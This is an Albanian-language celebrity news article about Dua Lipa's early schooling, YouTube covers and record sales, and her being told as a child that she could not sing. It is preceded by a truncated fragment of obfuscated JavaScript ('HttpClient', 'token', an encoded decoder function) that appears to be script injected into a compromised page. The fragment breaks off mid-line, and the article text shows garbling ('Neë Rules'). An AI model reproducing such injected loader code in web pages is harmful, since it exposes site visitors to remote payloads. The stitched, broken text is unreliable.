;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Dua Lipa sot yll botëror, por dikur i thanë se nuk di të këndojë

By

Duket sikur Dua Lipa doli papritur dhe e pushtoi botën si stuhi brenda natës me hitin e saj “Neë Rules”.

Por Dua merret me muzikë që kur ishte e vogël. Ajo vijoi mësimet në shkollën e arteve në Sylvia Young Theatre School në Londër deri në moshën 13 vjeçare.

Karrierën e saj e filloi duke postuar covers në Youtube të hiteve të asaj kohe e pjesa tjetër është histori.

Në vitin 2017 u shitën 1.5 milionë kopje të këngëve të saj duke lënë anash këngëtaret si Adele dhe Beyonce.

Përkundër suksesit të pa imagjinueshëm të saj, asaj dikur i thanë se nuk di të këndojë.

“Kur isha në shkollë fillore më thanë se nuk di të këndoj sepse nuk mund të arrij notat e larta. Kjo gjë më shkatërroi vetëbesimin – por prindërit e mi më dërguan në shkollë të muzikës dhe aty më thanë se di të këndoj dhe kjo më ndihmoi sadopak më vetëbesimin tim.” tha ajo për BBC.

Por për këdo që dyshoi në artisten, suksesi i saj është kundërpërgjigjja më e mirë.

 

Artikuj të ngjashëm